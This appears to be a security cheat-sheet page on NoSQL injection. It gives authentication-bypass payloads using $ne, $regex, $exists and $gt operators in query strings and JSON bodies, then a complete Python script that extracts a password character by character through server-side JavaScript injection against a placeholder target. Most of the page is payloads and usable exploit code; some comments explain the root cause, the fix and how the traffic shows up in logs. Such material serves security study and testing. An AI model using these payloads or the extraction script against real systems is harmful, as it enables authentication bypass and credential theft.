NoSQL injection

NoSQL injection is a vulnerability in which an attacker can interfere with the queries that an application makes to a NoSQL database. NoSQL injection may enable an attacker to:
Bypass authentication or protection mechanisms.
Extract or edit data.
Cause a denial of service.
Execute code on the server.
Authentication bypass
# In a URL query string
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true
# In a JSON body
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
Regex-based bypass
{
"username":{
"$regex":"^admi*"
},
"password":{
"$ne":"^.*"
}
}
Script to extract a password character by character with a regex
import requests
# Base URL for the target
# test_prefix() below appends its own "?user=..." query string to this value.
base_url = "https://tareget.com/user/lookup"
# Session cookie (modify this with your actual session cookie)
# Attached to every request made by test_prefix(); the value is a placeholder,
# nothing on this page supplies a real one.
cookies = {
    'session': 'COOKIE_HERE',
}
# Characters to test (extend this as needed)
# The search loop below stops at the first position where none of these
# characters matches, so a character outside this set ends the extraction there.
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
# Starting point for the password
# Characters confirmed by the oracle are appended here by the loop below.
password = ""
# Function to test a given prefix
def test_prefix(prefix: str) -> bool:
    """Return True if the response suggests that `prefix` starts the stored password.

    `prefix` is interpolated, unescaped, into a regex literal (`/^{prefix}.*$/`)
    inside a URL-encoded JavaScript boolean expression sent as the `user` query
    parameter; `%26%26` decodes to `&&` and `%00` to a NUL byte. The leading `'`
    presumably closes a string literal in a server-side JavaScript query (the
    payload references `this.password`, which only has meaning if the server
    evaluates the parameter as a query expression) — TODO confirm, this is not
    visible from the script itself. From a defensive standpoint the precondition
    is raw user input being spliced into a server-side JavaScript / `$where`-style
    clause; passing the value as a typed query argument and disabling server-side
    JavaScript evaluation removes it.
    """
    injection = f"?user=administrator'+%26%26+this.password+%26%26+this.password.match(/^{prefix}.*$/)%00"
    # NOTE(review): built but never used — requests.get below receives the URL
    # with the query string already appended and is not passed `params=`.
    params = {'user': injection}
    inject = base_url + injection
    # The module-level session cookie is attached to the request.
    response = requests.get(inject, cookies=cookies)
    # Oracle: the body containing "administrator" is taken as "condition was
    # truthy server-side"; presumably the lookup only returns the record then.
    return "administrator" in response.text
# Iteratively build the password
# Each position costs up to len(characters) requests, every one carrying
# "this.password" and "%26%26" in the query string — a high-volume, highly
# regular pattern that stands out in access logs and is easy to alert on.
while True:
    found_char = False
    # Try each candidate as the next character; the first one the oracle
    # confirms is appended and the scan restarts for the following position.
    for char in characters:
        test_pass = password + char
        if test_prefix(test_pass):
            password += char
            print(f"Found character: {char} -> Current password: {password}")
            found_char = True
            break
    # No candidate matched at this position: either the password is complete
    # or its next character lies outside `characters` — the script cannot
    # distinguish the two cases.
    if not found_char:
        print("Password extraction complete!")
        break
print(f"The password is: {password}")